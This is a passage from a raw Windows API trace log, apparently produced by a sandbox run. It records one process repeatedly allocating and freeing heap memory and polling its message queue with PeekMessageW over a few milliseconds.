lpMem=0x154cda8 | out: hHeap=0x12c0000) returned 1 [0121.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.336] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0121.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0121.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0121.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0121.336] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.336] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0121.336] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b18 [0121.336] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b18 | out: hHeap=0x12c0000) returned 1 [0121.337] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.337] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.337] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0121.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0121.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0121.337] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0121.337] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0121.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14588d8 [0121.338] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14588d8 | out: hHeap=0x12c0000) returned 1 [0121.338] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0121.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0121.338] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0121.338] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a78 [0121.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a78 | out: hHeap=0x12c0000) returned 1 [0121.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0121.338] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0121.339] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0121.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0121.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0121.339] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0121.339] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0121.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.339] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.339] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0121.340] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0121.340] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b58 [0121.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b58 | out: hHeap=0x12c0000) returned 1 [0121.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0121.340] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0121.340] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.340] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.340] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491878 [0121.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491878 | out: hHeap=0x12c0000) returned 1 [0121.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0121.341] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458bd8 | out: hHeap=0x12c0000) returned 1 [0121.341] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0121.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0121.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0121.341] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.341] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0121.341] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0121.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0121.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458e58 [0121.342] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458e58 | out: hHeap=0x12c0000) returned 1 [0121.342] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.342] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0c8 [0121.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0121.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0121.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0121.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0121.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0121.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0c8 | out: hHeap=0x12c0000) returned 1 [0121.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0121.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0121.343] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491918 [0121.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491918 | out: hHeap=0x12c0000) returned 1 [0121.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.343] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.343] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0121.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0121.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458b98 [0121.344] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.344] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458b98 | out: hHeap=0x12c0000) returned 1 [0121.344] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.344] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.344] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.344] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458898 [0121.344] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.344] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458898 | out: hHeap=0x12c0000) returned 1 [0121.344] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0121.344] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0121.344] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.344] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0121.344] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.344] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0121.344] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.344] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b58 [0121.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b58 | out: hHeap=0x12c0000) returned 1 [0121.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: 